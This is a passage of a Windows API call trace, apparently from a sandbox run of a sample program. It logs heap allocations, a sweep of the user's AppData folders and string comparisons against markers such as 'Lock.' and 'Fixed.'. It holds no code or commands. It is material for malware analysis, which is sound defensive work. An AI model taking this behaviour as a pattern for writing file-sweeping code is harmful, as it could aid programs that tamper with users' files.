out: hHeap=0x2af0000) returned 1 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0152.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.527] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.528] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d2da137, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="DBG", cAlternateFileName="")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd17602f9, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x13141, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0152.529] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0152.550] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0152.550] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0152.550] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0152.550] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2e540d50, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2e540d50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0152.551] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2af0000, ftCreationTime.dwHighDateTime=0x8cf2b0, ftLastAccessTime.dwLowDateTime=0x2af0000, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="Ƙʦ桰ʪⷾ瞉", cAlternateFileName="踚@鐔ʯ\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0152.551] FindClose (in: hFindFile=0x9e20b8 | out: hFindFile=0x9e20b8) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ActiveSync", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctiveSync", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tiveSync", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iveSync", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="veSync", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSync", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ActiveSync", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctiveSync", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tiveSync", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iveSync", cchCount1=6, lpString2="Fixed.", 